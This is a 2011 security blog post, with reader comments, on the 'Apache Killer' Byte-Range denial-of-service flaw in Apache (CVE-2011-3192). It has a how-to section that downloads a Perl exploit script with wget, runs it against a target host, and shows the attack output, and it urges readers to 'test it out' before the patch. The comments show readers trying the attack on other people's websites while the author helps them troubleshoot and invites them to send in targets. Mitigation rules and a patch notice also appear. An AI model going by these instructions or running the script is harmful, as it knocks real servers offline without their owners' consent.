We were following a thread , it was related to apache flaw which was discovered by KingCope.
It sends multiple GET requests with dozens of “Byte Ranges” that will eat up server’s memory. Byte Range helps browswer or downloading applications to download required parts of file. This helps reduce bandwidth usage. While this script sends dozen of unsorted components in request header to cause apache server to malfunction.
It is DoS condition on Apache web Server. I performed a test with a script written by @KingCope and can confirm that it will eat up Server resource in seconds.
Although the patch isn’t available from apache.org yet, we are still waiting for an update from Apache.
When some one execute this attack on your server, it will eat up your 1 GB RAM in 10 seconds, your CPU load will hit 10 average load and our server will finally freeze. Test it out before Apache release the fix 😀
How to use ‘Apache Killer’ Exploit on Linux (BackTrack 5) :
before you use this tiny script, you have to install one perl extension using cpan
utility.
cpan -i Parallel::ForkManager
Download perl script :
wget http://static.hackersgarage.com/killapache.pl.hackersgarage.com
mv killapache.pl.hackersgarage.com killapache.pl
Make it executable :
chmod u+x killapache.pl
Exploit your target :
perl killapache.pl example.com 50
Output :
host seems vuln
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
Mitigation for Apache Killer Range bytes header flaw?
From Full Disclosure mailing list is as follows;
More mitigation techniques defined : http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/browser
Option 1: (Apache 2.0 and 2.2) # Drop the Range header when more than 5 ranges. # CVE-2011-3192 SetEnvIf Range (,.*?){5,} bad-range=1 RequestHeader unset Range env=bad-range # optional logging. CustomLog logs/range-CVE-2011-3192.log common env=bad-range Option 2: (Also for Apache 1.3) # Reject request when more than 5 ranges in the Range: header. # CVE-2011-3192 # RewriteEngine on RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$) RewriteRule .* - [F]
Update 1 (26 Aug, 2011):
You can use mod_rewrite to mitigate this flaw
# Explicitly allow "range:0-" request from Flash uploaded client request RewriteCond %{HTTP:range} ^bytes=0-$ RewriteRule .* - [L] # @see http://marc.info/?l=apache-httpd-dev&m=131418828705324&w=2 RewriteCond %{HTTP:range} ^bytes=[^,]+(,[^,]+){0,4}$ RewriteRule .* - [F]
For Mod_Security ModSecurity 1.x users might do the trick – assuming they don’t really rely or use range request headers for anything.
# ApacheKiller - 2011 Flaw SecFilterSelective HTTP_Range !(^$|^bytes=0-$) SecFilterSelective HTTP_Request-Range !(^$|^bytes=0-$) Supposed to say: We accept range headers only when - "^$" empty value - or header not present - value is "bytes=0-"
Update 2 : Apache Releases FIX
Complete release is available here.
If you are still unable to fix this flaw, you can contact me for FREE Consultancy
14 replies on “Apache Killer – Denial of Service Flaw in Apache WebServer”
Great article, we have take this issue seriosly and do necessarily protection before its too late, thanks body for this.
Dear Khan
Thanks for your feedback. If is there anything we can help to mitigate this for you, feel free to contact us at tips at hackersgarage dot com.
[…] we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ […]
[…] have released Patch for the recent range bytes request flaw which we published few days ago. This patch fix the Security flaw […]
just working in 2 virtuals machine, after that i tried to do it more than ten times in others websites running apache (old versions 2010) and no security and i always got “Host does not seem vulnerable”
: (
Hi Richard
It is possible they have upgraded to latest version (Patch from Apache)
You can send us your target hosts at tips [] HackersGarage.com
[…] months back we posted Apache Range Byte flaw named ‘KillApache’ where we posted a perl script that can be use to freeze Apache web […]
was this a problem?
root@bt:~/Desktop/apache# perl killapache.pl
Can’t locate Parallel/ForkManager.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at killapache.pl line 13.
BEGIN failed–compilation aborted at killapache.pl line 13.
what is solution?
Perl extension is missing ..
You can install it
aptitude install libparallel-forkmanager-perl
thank you 🙂
how to install that perl extension on windows enviromnet
[…] have talked about ApacheKiller flaw in detail here with possible workaround to mitigate this […]
where can i get that pearl extension
was i this a problem?
host does not seem vulnerable
can you help me?